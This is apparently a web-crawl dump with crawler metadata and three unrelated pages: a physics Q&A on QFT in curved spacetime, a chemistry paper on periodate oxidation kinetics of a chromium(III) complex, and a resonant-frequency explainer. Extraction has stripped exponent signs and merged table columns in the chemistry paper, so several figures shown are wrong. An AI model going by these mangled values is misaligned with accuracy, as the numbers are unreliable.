msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c68c7a6f-1483-488c-ad2a-91f4e5c17831>\",\"WARC-Concurrent-To\":\"<urn:uuid:f67a84f7-0713-43dd-8377-4979fed1595d>\",\"WARC-IP-Address\":\"23.212.144.59\",\"WARC-Target-URI\":\"https://es.mathworks.com/matlabcentral/cody/problems/45209-an-ohm-s-law-calculator/solutions/2077487\",\"WARC-Payload-Digest\":\"sha1:XDB6V75UXTRE6ZJ3IC2UVMD5YVE2JSZE\",\"WARC-Block-Digest\":\"sha1:G2NWFIHU47WQAWMUVOW2OUJRSEL3FQMP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107881640.29_warc_CC-MAIN-20201024022853-20201024052853-00424.warc.gz\"}"}
https://physics.stackexchange.com/questions/238826/quantization-on-minkowski-schwarzschild-spacetimes-based-on-unusual-surface
[ "# Quantization on Minkowski/Schwarzschild spacetimes based on unusual surface\n\nI'm reading the book of Wald \"Quantum Field Theory in Curved Spacetime and Black Hole Thermodynamics\", and I'm pondering on this problem:\n\nIn Minkowski spacetime, we usually quantize our fields with respect to the $t$ coordinate, and a Cauchy surface we use is a t-constant slice (say $t=0$) - corresponding to an inertial observer. We can also quantize our field with respect to an accelerated observer in the region $\\mid x\\mid > t$, now with the slice $t=0, x>0$, and taking for time coordinate the proper time of one uniformly accelerated observer. The link between the two quantizations is what gives the Unruh effect. Now, instead of using $t=0$, we use another slice $t>0$, $S$ such that this slice now penetrates the region III of the below diagram. For the inertial observer, this will also give the same quantization as before. But for the accelerated one, assuming that our time coordinate still is the parameter $t$ is not clear to me that the resulting quantization will be unitarily equivalent to the preceding one (in the sense of Haag's theorem).", null, "Using the similarity of Minkowski and maximally extended Schwarzschild (ES) spacetimes (this time the region III corresponds to the interior of the black hole) and the equivalent of the surface $t=0$ to the ES yields again two quantizations with respectively associated vacua: Hartle-Hawking (HH) and Boulware (B) (this is well explained in Wald's book). However, what would happen to the quantizations based on the same Cauchy surface $S$ as above? Is it possible that the resulting quantizations are respectively unitarily equivalent to those giving the HH and B vacua?\n\nThe \"quantization procedure\", in the modern language, is nothing but the choice of a state over the $*$-algebra of quantum field used to build up a Fock representation via GNS rencostruction. A standard way, sometimes allowable, is to define the state using the (Cauchy) data of the field on a given Cauchy surface with geometric significance. For instance it could be normal to a preferred timelike Killing vector. Alternatively the surface may be a null surface (which a possibly at infinity) and this is a way to rigorously define the Unruh state for a massless state or natural states in asymptotically flat spacetimes. The state enjoys some relation with the surface for instance it is invariant under a Killing vector field normal to it or tangent to it. The most common procedure consists of defining a scalar product using the Fourier decomposition of the evolution equation of the field with respect to the preferred Killing vector (e.g., using only the positive frequency part). This is not the only possibility however. A spacelike surface, as the one you are considering, does not carry information enough to permit the definition of a state.\n\nIf you have two states and corresponding GNS constructions (Fock representations), the issue of unitary equivalence can be discussed referring to some known theorems also mentioned in Wald's book (unfortunately a statement therein is wrong due to a misprint where the word trace class appears in place of Hilbert Schmidt. An recent quite elementary up-to-date review on basic ideas of QFT in curved spacetime can be found here)\n\nReferences from my research activity\n\nC. Dappiaggi, V. Moretti and N. Pinamonti: Rigorous construction and Hadamard property of the Unruh state in Schwarzschild spacetime. Adv. Theor. Math. Phys. 15, vol 2, 355-448 (2011) 93 pages\n\nC.Dappiaggi, V. Moretti, N. Pinamonti: Distinguished quantum states in a class of cosmological spacetimes and their Hadamard property. J. Math. Phys. 50, 062304 (2009). 39 pages\n\nC.Dappiaggi, V. Moretti, N. Pinamonti: Cosmological horizons and reconstruction of quantum field theories. Commun. Math. Phys. 285, 1129 (2009). 32 pages\n\nV. Moretti: Quantum out-states states holographically induced by asymptotic flatness: Invariance under spacetime symmetries, energy positivity and Hadamard property. Commun. Math. Phys. 279, 31 (2008). 44 pages\n\nV. Moretti: Uniqueness theorems for BMS-invariant states of scalar QFT on the null boundary of asymptotically flat spacetimes and bulk-boundary observable algebra correspondence Commun. Math. Phys. 268, 727 (2006). 30 pages" ]
[ null, "https://i.stack.imgur.com/VAllF.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88437545,"math_prob":0.9554392,"size":1633,"snap":"2023-14-2023-23","text_gpt3_token_len":383,"char_repetition_ratio":0.120933086,"word_repetition_ratio":0.0,"special_character_ratio":0.21310471,"punctuation_ratio":0.077181205,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9820681,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-20T21:49:31Z\",\"WARC-Record-ID\":\"<urn:uuid:8bfe81e0-2fd5-4b28-a829-2759fbabb304>\",\"Content-Length\":\"150179\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:50e0c246-0904-4a9b-8efb-ef94463ddf86>\",\"WARC-Concurrent-To\":\"<urn:uuid:d3fd6acd-c196-4f79-93ee-cc25056da48d>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://physics.stackexchange.com/questions/238826/quantization-on-minkowski-schwarzschild-spacetimes-based-on-unusual-surface\",\"WARC-Payload-Digest\":\"sha1:6W54TYSYMECQ2DBRDTJ6T2LWCAV2OJXZ\",\"WARC-Block-Digest\":\"sha1:OL7UNERZM53I4ZICN5ZB56A7VWUSSF44\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296943562.70_warc_CC-MAIN-20230320211022-20230321001022-00745.warc.gz\"}"}
https://www.scirp.org/xml/87801.xml
[ "OJICOpen Journal of Inorganic Chemistry2161-7406Scientific Research Publishing10.4236/ojic.2018.84008OJIC-87801ArticlesChemistry&Materials Science Periodate Oxidation of a Ternary Complex of Nitrilotriacetatochromium(III) Involving ß-Alanine as Co-Ligand HassanA. Ewais1AhmedH. Abdel-Salam2*AmalS. Basaleh1MohamedA. Habib3Chemistry Department Faculty of Science, Al-Tahadi University, Serit, LybiaChemistry Department, Faculty of Science, King Abdulaziz University, Jeddah, KSAChemistry Department, Faculty of Science, University of Jeddah, Jeddah, KSA151020180804911045, September 201812, October 2018 15, October 2018© Copyright 2014 by authors and Scientific Research Publishing Inc. 2014This work is licensed under the Creative Commons Attribution International License (CC BY). http://creativecommons.org/licenses/by/4.0/\n\nThe kinetics of the periodate oxidation of chromium(III)-complex, [Cr III(NTA)(Ala)(H 2O)]-(NTA = Nitrilotriacetate and Ala = &#223;-alanine) to Cr(VI) have been carried out for the temperature range 15 °C - 35 °C under pseudo-first order conditions,", null, ">> [complex]. Reaction obeyed first order dependence with respect to", null, "and [Cr(III)], and the rate of reaction increases with increasing of pH for the range 3.40 - 4.45. Experimentally, the mechanism of this reaction is found to be consistent with the rate law in which the hydroxo species, [Cr III(NTA)(Ala)(OH)] 2- is considerably much more reactive than their conjugate acid. Δ H* and Δ S* have been calculated. It is proposed that electron transfer occurs through an inner-sphere mechanism via coordination of", null, "to chromium(III).\n\nNitrilotriacetatochromium(III) Ternary Complex Periodate Oxidation Inner-Sphere Mechanism Thermodynamic Activation Parameters\n1. Introduction\n\nThe Ternary complexes of oxygen-donor ligands and heteroaromatic N-bases such as nitrilotriacetic acid (NTA) and iminodiacetic acid (IDA) with transition metals have attracted much interest, as they can display exceptionally high stability and may be biologically relevant . The use of transition metal complexes of NTA is gaining increasing use in biotechnology, particularly in the protein purification technique known as immobilized metal-ion chromatography . The chromium(III) complexes of a amino acids are biologically available, depending on the complexing ability of the ligands for chromium against OH. Chromium can also aid in the transportation of amino acids through the cell membrane . The biological oxidation of chromium from the trivalent to the hexavalent state is an important environmental process because of the high mobility and toxicity of chromium(VI) . Recently, Cr(III) oxidation to Cr(V) and/or Cr(VI) in biological systems came into consideration as a possible reason for the anti-diabetic activities of some Cr(III) complexes, as well as the long-term toxicities of such complexes . The specific interactions of chromium ions with cellular insulin receptors are a consequence of intra- or extracellular oxidations of Cr(III) to Cr(V) and/or Cr(VI) compounds, which act as protein tyrosine phosphatase (PTP) inhibitors. Periodate oxidations have been reported to play an important role in biological processes .\n\nStudies of the kinetics of periodate oxidations on a series of dextran oligomers, polymers and some dimeric carbohydrates revealed a dependence of the kinetic rates on the molecular weight. The oxidation of caffeic acid (3,4-dihydroxy cinnamic acid) by sodium periodate was found to mimic the mechanism of polyphenol oxidase. The antioxidant product 2-s-cysteinyl caffeic acid exhibits slightly improved antiradical activity compared to the parent molecule (caffeic acid) . The imidazol-modified M-salophen/NaIO4 system can be applied to oxidize a large number of primary aromatic amines in good yield at short times and room temperature .\n\nAn inner-sphere mechanism for oxidation of chromium(III) complexes of some amino acids and nucleosides by periodate has been proposed with the hydroxo group acting as bridging ligand, or through the substitution of coordinated H2O by [IO4]. Oxidation of ternary nitrilotriacetatocobalt(II) complexes involving succinate, malonate, tartrate, maleate and benzoate as secondary ligands by periodate has been investigated . In all cases, initial cobalt(III) products were formed, and these changed slowly to the final cobalt(III) products. It is proposed that the reaction follows an inner-sphere mechanism, involving a ring closure step that is faster than the oxidation step. The IVI in the initial product is probably substitutional by water at a very slow rate due to the substituted inertness of Co(III) and also the Co(II)-OIO3 bond being stronger than Co-H2O bond. The oxidation of cobalt(II) complexes of propylenediaminetetraacetate (PDTA) , 1,3-diamino-2-hydroxypropanetetraacetate (HPDTA) , diethylenetriamine-pentaacetate (DPTA) , trimethylenediaminetetraacetate (TMDTA) and ethyleneglycol,bis(2-aminoethyl)ether,N,N,N0,N0-tetraacetate (EGTA) by periodate gave only the final product. Periodate oxidations of the chromium(III) complexes of NTA , 2-aminopyridine and IDA were studied. In all cases, the electron transfer proceeds through an inner-sphere mechanism via coordination of IO 4 − to chromium(III).\n\nIn this paper, we report on the kinetics and mechanism of the periodate oxidation of ternary complexes of chromium(III) involving NTA as primary ligand and ß-alanine as a secondary ligand, in order to study the effect of secondary ligand on the stability of [CrIII(NTA)(Ala)(H2O)] toward oxidation.\n\n2. Experimental2.1. Materials and Methods\n\nThe ternary complexes of chromium(III) involving nitrilotriacetato and β-alanine was prepared according to the report method . All chemicals used in this study were of analar grade (BDH, Aldrich and Sigma). Buffer solutions were prepared from CH3COONa (Sigma 99%) and CH3COOH (BHD 99.9%) of known concentration. NaNO3 (Aldrich 99.99%) was used to adjust ionic strength in the different buffered solutions. Doubly distilled H2O was used in all kinetic runs. A stock solution of NaIO4 (Aldrich 99.9%) was prepared by accurate weighing and wrapped in aluminum foil to avoid photochemical decomposition .\n\n2.2. Instrumentation\n\nUV-vis spectrophotometer model JASCO UV-530 was used to record the electronic spectra of the investigated complexes. The oxidation of complex, [CrIII(NTA)(Ala)(H2O)] by IO 4 − were followed spectrophotometrically. The absorption measurements for the oxidation of reaction products are maximum at the reaction pH. Automatic circulation thermostat was used to regulate the temperature of solution. The average stabilizing accuracy was ±0.1˚C. Large excess of IO 4 − (>10-fold) was used in all measurements to get the pseudo-first order situation. NaNO3 solution was utilized to make a constant ionic strength. It is noticed that during the course of the reaction the pH of the reaction is constant.\n\n2.3. Kinetic Measurements\n\nThe UV-Visible absorption spectra of the products of oxidation of the complex [CrIII(NTA)(Ala)(H2O)] by IO 4 − was followed spectrophotometrically for a measured period of time using a JASCO UV-530 spectrophotometer. All reactants were thermally equilibrated for ca 15 min in an automatic circulation thermostat, then mixed thoroughly and quickly transferred to an absorption cell. The oxidation rates were measured by monitoring the absorbance of Cr(VI) at 350 nm, on a Jenway 3600 spectrophotometer, where the absorption of the oxidation products is maximal at the reaction pH. The pH of the reaction mixture was measured using a G-C825 pH-meter. Pseudo-first-order conditions were maintained in all runs by maintaining a large excess (>10-fold) of IO 4 − over complexes. The ionic strength was kept constant by the addition of NaNO3 solution. The pH of the reaction mixture was found to be constant during the reaction runs. Potentiometric measurements were performed with a Metrohm 702 SM titrino, using Irving and Rossotti techniques .\n\n3. Results and Discussion\n\nThe UV-Visible spectra of the oxidation product of the complex, [CrIII(NTA)(Ala)(H2O)] by periodate were recorded over time on a JASCO UV-530 spectrophotometer (Figure 1). The spectrum gives a maxima at 564 and 410 nm for [CrIII(NTA)(Ala)(H2O)] complex which disappeared and replaced by a single peak at 350 nm due to the formation of chromium (VI). The presence of one isosbestic point at 501 nm in the absorption spectra (Figure 1) indicates the presence of two absorbing species in equilibrium. To measure the stoichiometry, a known excess of Cr(III) complex was added to IO 4 − solution and the absorbance of Cr(VI) produced was measured at 350 nm after 24 h. The quantity of Cr(III) consumed was calculated using the molar absorptivity of Cr(VI) at the utilized pH.\n\nThe oxidation of [CrIII(NTA)(Ala)(H2O)]-complex by periodate was carried out in the pH range 3.40 - 4.45, 0.2 M ionic strength, [ IO 4 − ] range (0.5 - 5.0) × 10−2 M and with temperature range 15˚C - 35˚C (±0.1˚C). The stoichiometry of the reaction can be represented by Equation (1):\n\n2Cr ( III ) + 3I ( VII ) → 2Cr ( VI ) + 3 I ( V ) (1)\n\nwhere Cr(III) and I(VII) represent total chromium(III)-complex and periodate, respectively. The concentration ratio of IO 4 − initially present to Cr(VI)\n\nproduced was found to be 3:2. The stoichiometry is also consistent with the observation that IO 3 − does not oxidize the Cr(III)-complex over the studied pH range. Table 1 shows pseudo-first order rate constants, kobs. Data obtained exhibits that kobs does not have any effect, when we change the concentration of [CrIII(NTA)(Ala)(H2O)] complex with constant IO 4 − concentration of 2.0 × 102 mol・dm3, pH = 4.05, ionic strength 0.20 mol・dm3, temperature 25˚C and at different concentrations of complex over the range (1.25 - 6.25) × 104 mol・dm3, confirming that this reaction is first order and related to the concentration of Cr(III) complex, [CrIII(NTA)(Ala)(H2O)]. This behavior is represented by Equation (2).\n\nRate = k obs [ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − (2)\n\nThe effect of periodate on the rate of the reaction of CrIII(NTA)(Ala)(H2O)] was studied over the temperature range (15˚C - 35˚C). The variation of rate constant, kobs, with different concentrations of [ IO 4 − ] at different temperatures are summarized in Table 1. Plotting kobs against [ IO 4 − ] , was found to be linear without intercept as shown in Figure 2. The dependence of kobs on [ IO 4 − ] is thus described by Equation (3):\n\nk obs = k 1 [ IO 4 − ] (3)\n\nThe dependence of the reaction rate on pH was investigated over the 3.40 - 4.45 pH range at constant [ IO 4 − ] = 2.0 × 102 mol・dm3, [CrIII(NTA)(Ala)(H2O)] = 2.5 × 104 mol・dm3, I = 0.20 mol・dm3 and T = 25˚C. The kinetic data are graphically represented in Figure 3. Variation of the kobs with pH is summarized in (Table 2), which indicates that the reaction rate increases with increasing pH values. Plot of kobs against [ IO 4 − ] at different pH values are given in Figure 3. From Figure 3, it was found that, the slopes are dependent on pH (Table 3). Plot of these slopes (k1) versus 1/H+ are linear with slope (k3) and an intercept (k2) according to Equation (4).\n\nk 1 = k 2 + k 3 / [ H + ] (4)\n\nDependence of k<sub>obs</sub> on [ IO 4 − ] at pH = 4.05, [Cr<sup>III</sup>(NTA)(Ala)(H<sub>2</sub>O)]<sup>−a</sup> = 2.5 × 10<sup>−4</sup> mol・dm<sup>−3</sup>, and I = 0.2 mol・dm<sup>−3</sup> at different temperatures\n10 2 [ IO 4 − ] (mol・dm−3)104 kobs (s−1) 15˚C20˚C25˚C30˚C35˚C\n0.50.5000.881.201.512.31\n1.01.251.952.963.486.23\n1.52.513.254.154.818.50\n2.02.984.55.656.3312.00\n3.04.466.688.3110.1513.50\n4.0-8.809.8612.25-\n5.07.2510.2012.75-20.05\nEffect of pH on k<sub>obs</sub> at [Cr<sup>III</sup>(NTA)(Ala)(H<sub>2</sub>O)]<sup>−</sup> = 2.5 × 10<sup>−4</sup> mol・dm<sup>−3</sup>, I = 0.2 mol・dm<sup>−3</sup>, and T = 25˚C\n10 2 [ IO 4 − ] (mol・dm−3)104kobs (s−1) pH = 3.40pH = 3.72pH = 4.05pH = 4.27pH = 4.45\n0.50.660.831.201.663.60\n1.00.881.512.965.51-\n1.51.202.284.146.48.45\n2.01.582.665.6510.5112.16\n3.02.954.018.3115.519.01\n4.04.165.669.8619.0322.56\n5.05.007.5812.7523.6831.20\nValues of (k<sub>1</sub>) at different temperatures\nT (˚C)103/T (K−1)102k1 (mol−1・dm3・s−1)−lnk1/T (mol−1・dm3・s−1・K−1)\n153.471.429.92\n203.412.139.53\n253.352.649.33\n303.303.219.15\n353.254.058.93\n\nThe values of k2 and k3 were obtained from the intercept and slope as 4.28 × 10−3 mol−1・dm3・s−1 and 2.09 × 10−6 s−1 respectively at T = 25˚C.\n\nFrom Equations (2), (3) and (4), the rate law for the oxidation of [CrIII(NTA)(Ala)(H2O)] by periodate is given by Equation (5):\n\nd [ Cr VI ] / d t = [ IO 4 − ] [ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − ( k 2 + k 3 / [ H + ] ) (5)\n\nand\n\nk obs = ( k 2 + k 3 / [ H + ] ) [ IO 4 − ] (6)\n\nTable 3 shows the values of k1 which obtained from the slopes of Figure 2 at different temperatures. From these results, thermodynamic activation parameters ∆H* and ∆S* associated with constant (k1) in Equation (3) were calculated using Eyring approximation. ∆H* and ∆S* are equal to 35.75 kJ・mol−1 and −155.3 J・K−1・mol−1 respectively. According to the data reported, The effect of hydrogen ion concentration was investigated over the pH range 3.40 - 4.45, we noticed that in acidic aqueous medium the chromium(III) complex may be involved in the equilibrium shown in Equation (7).\n\n[ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − ⇌ [ Cr III ( NTA ) ( Ala ) ( OH ) ] 2 − + H +             K 1 (7)\n\nThe value of K1 can be determined potentiometrically and has the value 1.70 × 10−5 at 25˚C. From the pH range and K1 value, it may be suggested that the involvement of the deprotonated form of the chromium(III)-complex in the rate-determining step. There are possibilities for the coordination of IO 4 − due to the following reasons. Firstly, the H2O ligand in [CrIII(NTA)(Ala)(H2O)] may be labile and hence substitution by IO 4 − is likely . Secondly, periodate ion is capable of acting as a ligand, as evidenced from its coordination to copper(III) and nickel(IV) . Also there is a direct relationship between the reaction rate and ionic strength, where the values of 104kobs obtained at I = 0.30, 0.40, 0.50 and 0.60 mol・dm−3, pH = 4.05, [ IO 4 − ] = 0.02 mol・dm−3 and T = 25˚C are 5.83, 6.05, 6.27 and 6.57, respectively which is attributed to the reaction between similar charged species. It may be concluded that from the reported equilibrium constants of aqueous periodate solutions over the pH range used that, the periodate species likely to be present are IO 4 − , H 4 IO 6 − and H 3 IO 6 2 − , according to the equilibria, Equations (8)-(10):\n\nH 5 IO 6 ⇌ H 4 IO 6 − + H +             ( K 2 = 1.98 × 10 − 3   dm 3 ⋅ mol − 1 ) (8)\n\nH 4 IO 6 − ⇌ 2H 2 O + IO 4 −             ( K 3 = 0.025 ) (9)\n\nH 4 IO 6 − ⇌ H 3 IO 6 2 − + H +           ( K 4 = 5.0 × 10 6   dm 3 ⋅ mol − 1 ) (10)\n\nFrom K4 value, H 3 IO 6 2 − is not the predominant species ( IO 4 − will be used to represent H 4 IO 6 − ).\n\nThe mechanistic pathway for the oxidation of nitrilotriacetatetrisodium salt chromium(III) complex by periodate over the studied pH range may be represented by Equations (11)-(23):\n\n[ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − ⇌ [ Cr III ( NTA ) ( Ala ) ( OH ) ] 2 − + H +             K 1 (11)\n\n[ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − + [ IO 4 − ] ⇌ [ Cr III ( NTA ) ( Ala ) ( OIO 3 ) ] 2 − + H 2 O           K 5 (12)\n\n[ Cr III ( NTA ) ( Ala ) ( OH ) ] 2 − + [ IO 4 − ] ⇌ [ Cr III ( NTA ) ( Ala ) ( OH ) ( OIO 3 ) ] 3 −         ( K 6 ) (13)\n\n[ Cr III ( NTA ) ( Ala ) ( OIO 3 ) ] 2 − → k 4 Products (14)\n\n[ Cr III ( NTA ) ( Ala ) ( OIO 3 ) ( OH ) ] 3 − → k 5 Products (15)\n\nFrom the above mechanism, the rate of the reaction is given by:\n\nd [ Cr VI ] / d t = k 4 [ Cr III ( NTA ) ( Ala ) ( OIO 3 ) ] 2 −     + k 5 [ Cr III ( NTA ) ( Ala ) ( OH ) ( OIO 3 ) ] 3 − (16)\n\nSince\n\n[ Cr III ( NTA ) ( Ala ) ( OIO 3 ) ] 2 − = K 5 [ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − [ IO 4 − ] (17)\n\nand\n\n[ Cr III ( NTA ) ( Ala ) ( OH ) ( OIO 3 ) ] 3 − = K 6 [ Cr III ( NTA ) ( Ala ) ( OH ) ] 2 − [ IO 4 − ] (18)\n\nSubstitution in Equations (17) and (18) in Equation (16) leads to:\n\nd [ Cr VI ] / d t = K 2 k 4 [ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − [ IO 4 − ]     + k 5 K 6 [ Cr III ( NTA ) ( Ala ) ( OH ) ] 2 − [ IO 4 − ] (19)\n\nSince\n\n[ Cr III ( NTA ) ( Ala ) ( OH ) ] 2 − = K 1 [ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − / [ H + ] (20)\n\nSubstitution Equation (20) in Equation (19) we obtained:\n\nd [ Cr VI ] / d t = K 5 k 4 [ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − [ IO 4 − ]     + ( k 5 K 6 K 1 / [ H + ] ) [ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − [ IO 4 − ] (21)\n\nOn rearrangement:\n\nd [ Cr VI ] / d t = ( k 4 K 5 + k 5 K 6 K 1 / [ H + ] ) [ Cr III ( NTA ) ( Ala ) ( H 2 O ) ] − [ IO 4 − ] (22)\n\nHence,\n\nk obs = [ IO 4 − ] { k 4 K 5 + ( k 5 K 1 K 6 / [ H + ] ) } (23)\n\nFrom a comparison of Equations (6) and (23) one obtains k2 = k4K5 and k3 = k5K1K6. Equation (23) contains two terms, first term represents path independent of [H+] and the second term represents path dependent on [H+]. In comparison with the oxidation of [Cr(NTA)(H2O)2] under the same conditions, the deprotonated complexes are significantly found to be more reactive than their conjugate acids. The rate of oxidation of this [Cr(NTA)(H2O)2] is more than [CrIII(NTA)(Ala)(H2O)] This means that the stability of the ternary complex, [CrIII(NTA)(Ala)(H2O)], is more than the binary one, [Cr(NTA)(H2O)2], toward oxidation. This may be due to the presence of the amino acid as a secondary ligand in the ternary complex, increase the stability of chromium(III) towards oxidation than binary complex, [CrIII(NTA)(H2O)2].\n\nThe small ΔH* values and large negative activation entropies reasonably could reflect some nonadibatically in the electron transfer process . Both ΔH* and ΔS* then may be expected to systematically increases as the orientation of the oxidant in the precursor complex is alter so as to enhance overlap between donor and acceptor redox orbitals and consequently the probability of adiabatic electron transfer . The relatively low value of ΔH* for [CrIII(NTA)(Ala)(H2O)] is due to its composite value including formation which may be exothermic and intramolecular electron transfer which may be endothermic.\n\nEnthalpies and entropies of activation for the oxidation of chromium(III) complexes by periodate are collected in Table 4. ΔH* and ΔS* for the oxidation of these complexes were calculated related to intramolecular electron transfer steps except for [CrIII(HIDA)2(H2O)], and [CrIII(NTA)(Hist)(H2O)], ΔH* and ΔS* are composite values including the enthalpy of formation of the precursor complexes and the intramolecular electron transfer steps. A plot of ΔH* versus ΔS* for these complexes is shown in Figure 4, and an excellent linear relationship\n\nEnthalpies and entropies of activation for the oxidation of chromium(III) complexes by periodate\nComplex103ket (s−1)ΔH* (KJ/mol)−ΔS* (J/Kmol)Ref.Figure 4 key\n[CrIII(TOH)(H2O)]2.957638.7291\n[CrIII(NTA)(Asp)(H2O)]3.9364.676132\n[CrIII(Ud)(Asp)(H2O)3]2+0.7059.5106.8163\n[CrIII(NTA)(Hist)(H2O)]32.0036.5148134\n[CrIII(NTA)(Ala)(H2O)]26.4035.75155.3This work5\n[CrIII(Arg)2(H2O)2]+3.4630192136\n[CrIII(NTA)(H2O)2]62.0014220237\n[CrIII(HIDA)2(H2O)]10.9012.3240.7258\n\nwas obtained. Similar linear plots were found for a large number of redox reactions and for each reaction series a common rate-determining step is proposed. The isokinetic relation lends support a common mechanism for the oxidation of chromium(III) complexes, reported here, by periodate.\n\nThis consists of a periodate ion coordination to the chromium(III) complexes in step preceding the rate-determining intramolecular electron transfer within the precursor complex. Isokinetic compensation between ΔH* and ΔS* in a series of related reactions usually implies that one interaction between the reactants varies within the series, the remainder of the mechanism being invariant . The electron transfer reactivities of these complexes with periodate are comparable, as the coordination of periodate with these complexes are identical. All of this suggests that the excellent correlation often observed between ΔS* and ΔH* mainly reflects the fact that both thermodynamic parameters are in reality two measures of the same thing, and that measuring a compensation temperature is just a rather indirect way of measuring the average temperature at which the experiments were carried out. As this temperature will often be in a range that the experimenter expects to have some biological significance, it is not surprising if the compensation temperature turns out to have a biologically suggestive value .\n\n4. Conclusion\n\nOxidation of [CrIII(NTA)(Ala)(H2O)] by periodate proceeds via an inner-sphere mechanism. Rate of oxidation increases with increasing pH. These reactions proceed through two-electron transfer process leading to the formation of chromium(VI). A common mechanism for the oxidation of ternary chromium(III) complex by periodate is proposed, and is supported by the excellent isokinetic relationship between ΔH* and ΔS* values for these reactions.\n\nConflicts of Interest\n\nThe authors declare no conflicts of interest regarding the publication of this paper.\n\nCite this paper\n\nEwais, H.A., Abdel-Salam, A.H., Basaleh, A.S. and Habib, M.A. (2018) Periodate Oxidation of a Ternary Complex of Nitrilotriacetatochromium(III) Involving ß-Alanine as Co-Ligand. Open Journal of Inorganic Chemistry, 8, 91-104. https://doi.org/10.4236/ojic.2018.84008" ]
[ null, "https://www.scirp.org/xml/Edit_466b868e-76e7-4c4f-9072-1f6bc564ba06.bmp", null, "https://www.scirp.org/xml/Edit_8d91d7ad-339a-4a58-9df8-1d19a7a5fced.bmp", null, "https://www.scirp.org/xml/Edit_29639711-0b01-44bf-bd8f-9a169dae6ad8.bmp", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8351416,"math_prob":0.9176164,"size":10987,"snap":"2020-34-2020-40","text_gpt3_token_len":3878,"char_repetition_ratio":0.1581535,"word_repetition_ratio":0.23951286,"special_character_ratio":0.40010923,"punctuation_ratio":0.104329005,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96693045,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-22T04:49:01Z\",\"WARC-Record-ID\":\"<urn:uuid:f344c20d-a3d8-4efb-88fd-db743858f309>\",\"Content-Length\":\"56085\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a033f3be-9f2a-46d4-a67f-6d03d2c14f61>\",\"WARC-Concurrent-To\":\"<urn:uuid:26d444e9-8db9-4db1-8797-d8943914d1df>\",\"WARC-IP-Address\":\"209.141.51.63\",\"WARC-Target-URI\":\"https://www.scirp.org/xml/87801.xml\",\"WARC-Payload-Digest\":\"sha1:D6AFV22UYTJ3JWQ6OUGFIPM4EYPUGZN2\",\"WARC-Block-Digest\":\"sha1:WZZPWQP3LBVWFQQYLEHMZJF4W4BF2ZU2\",\"WARC-Identified-Payload-Type\":\"application/xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400203096.42_warc_CC-MAIN-20200922031902-20200922061902-00418.warc.gz\"}"}
https://circuitglobe.com/what-is-resonant-frequency.html
[ "# Resonant Frequency\n\nThe resonant frequency condition arises in the series circuit when the inductive reactance is equal to the capacitive reactance. If the supply frequency is changed the value of XL = 2πfL and XC = 1/2πfC is also changed.\n\nWhen the frequency increases, the value of XL increases, whereas the value of XC decreases. Similarly, when the frequency decreases, the value of XL decreases and the value of XC increases.\n\nThus, to obtain the condition of series Resonance, the frequency is adjusted to fr, point P as shown in the curve below. At point P when (XL = XC) the resonant frequency condition is obtained.", null, "At series resonance, when XL = XC", null, "Where fr is the resonant frequency in hertz when inductance L is measured in Henry and capacitance C in Farads." ]
[ null, "https://circuitglobe.com/wp-content/uploads/2015/10/resonant-frequency-condition-compressor1.jpg", null, "https://circuitglobe.com/wp-content/uploads/2015/10/series-resonance-eq2-compressor1.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92393106,"math_prob":0.9928993,"size":748,"snap":"2021-43-2021-49","text_gpt3_token_len":173,"char_repetition_ratio":0.18010753,"word_repetition_ratio":0.0,"special_character_ratio":0.20989305,"punctuation_ratio":0.10489511,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9943738,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,5,null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-23T20:55:22Z\",\"WARC-Record-ID\":\"<urn:uuid:2569aea1-a8ff-42a5-a36a-4caed1089e00>\",\"Content-Length\":\"122850\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:201e4114-895e-48c8-9358-ffe276578570>\",\"WARC-Concurrent-To\":\"<urn:uuid:045494df-e7a6-4af8-b230-ed72b086b56f>\",\"WARC-IP-Address\":\"67.43.12.246\",\"WARC-Target-URI\":\"https://circuitglobe.com/what-is-resonant-frequency.html\",\"WARC-Payload-Digest\":\"sha1:6EGN3MLQBJGMCLKS2NS62LHNAZT46SX3\",\"WARC-Block-Digest\":\"sha1:F22Q35NEJLW3IXNDRHRFU56KY764F4GP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585768.3_warc_CC-MAIN-20211023193319-20211023223319-00064.warc.gz\"}"}
https://m.jb51.net/article/264964.htm
